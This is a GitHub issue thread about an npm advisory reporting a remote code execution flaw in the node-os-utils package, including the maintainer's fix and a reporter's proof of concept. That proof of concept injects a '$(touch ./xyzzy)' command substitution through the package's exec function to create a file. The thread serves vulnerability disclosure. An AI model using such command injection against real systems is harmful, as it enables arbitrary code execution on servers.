### ISSUE TITLE
package is signed as high severity vulnerability from npm

### ISSUE THREAD

**Issue by gchiocchio** [SunilWang/node-os-utils#2]
package is signed as high severity vulnerability from npm

https://nodesecurity.io/advisories/784

**Comment by Zorono** [comment]
![image](https://user-images.githubusercontent.com/19735243/67319119-ca107680-f50c-11e9-93cb-431138f9142b.png)
i agree with you...

**Comment by SunilWang** [comment]
fix done！

npm install node-os-utils@1.1.0

**Comment by rdimascio** [comment]
Seems like this hasn't been fixed yet

[https://www.npmjs.com/advisories/784](https://www.npmjs.com/advisories/784)

**Comment by SunilWang** [comment]
@rdimascio 
already modified once, I don't know where there will be risks.
已经修改过一次，我不知道哪里会有风险。

because call system commands?
是因为调用系统命令？

**Comment by peterkingsbury** [comment]
Could it work to contact the individual who reported the incident? He may have specifics that you can react to. The advisory site https://www.npmjs.com/advisories/784 links his homepage, where there is email for him to be contacted.

**Comment by SunilWang** [comment]
@peterkingsbury 
Email sent, waiting for reply,Thanks for feedback.

**Comment by SunilWang** [comment]
@peterkingsbury @rdimascio @Zorono  @gchiocchio 

https://www.npmjs.com/advisories/784

**Overview**
Versions of node-os-utils prior to 1.1.0 are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution.

**Remediation**
Upgrade to version 1.1.0 or later

Thank you all，
Latest version 1.2.1

**Comment by franktip** [comment]
Hello, sorry for the delayed response. The following code snippet demonstrates the vulnerability in the version that I originally examined:
------------------
done = function done(){
    console.log("Done!");
};


var DUMMY_FILE = './xyzzy';

var command = "$(touch " + DUMMY_FILE + ")";

function dummySource(val){
    command += val;
}

dummySource(' ');

var nodeosutils = require('node-os-utils')
var exec = nodeosutils.exec;
exec(command)();

done();
----------------------
executing this code resulted in the creation of a file "xyzzy" due to the execution of an injected command.

**Comment by franktip** [comment]
I just tried running this code with the current version of node-os-utils, and the vulnerability appears to have been eliminated.
